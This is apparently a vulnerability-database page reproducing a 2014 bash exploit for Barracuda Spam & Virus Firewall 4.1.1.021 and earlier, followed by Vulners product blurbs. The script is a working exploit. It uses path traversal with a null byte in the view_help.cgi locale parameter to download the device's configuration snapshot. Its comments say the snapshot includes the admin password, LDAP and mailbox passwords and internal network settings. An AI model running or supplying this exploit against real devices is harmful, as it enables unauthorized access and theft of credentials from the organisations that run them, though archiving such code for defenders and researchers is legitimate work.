Lucene search
K

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 26 Views

Barracuda Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval Exploi

Code

                                                #!/bin/bash
# Exploit by ShadowHatesYou
# [email protected]
#
# The resulting output is an SQL dump containing the Barracuda&#39;s configuration, which includes goodies such as:
#
# The administrative password for the BSF(system_password)
# MTA LDAP passwords(mta_ldap_advanced_password)
# Password for each configured mailbox(user_password)
# Internal networking information(system_gateway, system_ip, system_netmask, system_primary_dns_server, system_secondary_dns_server)
#
#
# Exploit-DB Notes:
# If /cgi-mod/view_help.cgi returns a 404, try /cgi-bin/view_help.cgi instead. You should be able to determine this manually since Barracuda automatically redirects you to the login page anyway.

if [ $# != 1 ]; then
	echo &#34;# Barracuda Networks Spam & Virus Firewall &#60;= 4.1.1.021 Remote Configuration Retrieval&#34;
	echo &#34;# Use: $0 &#60;host/ip&#62; &#34;
	echo &#34;#&#34;
	exit;
fi;
curl http://$1:8000/cgi-mod/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00 &#62; $1.config
ls -hl $1.config
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation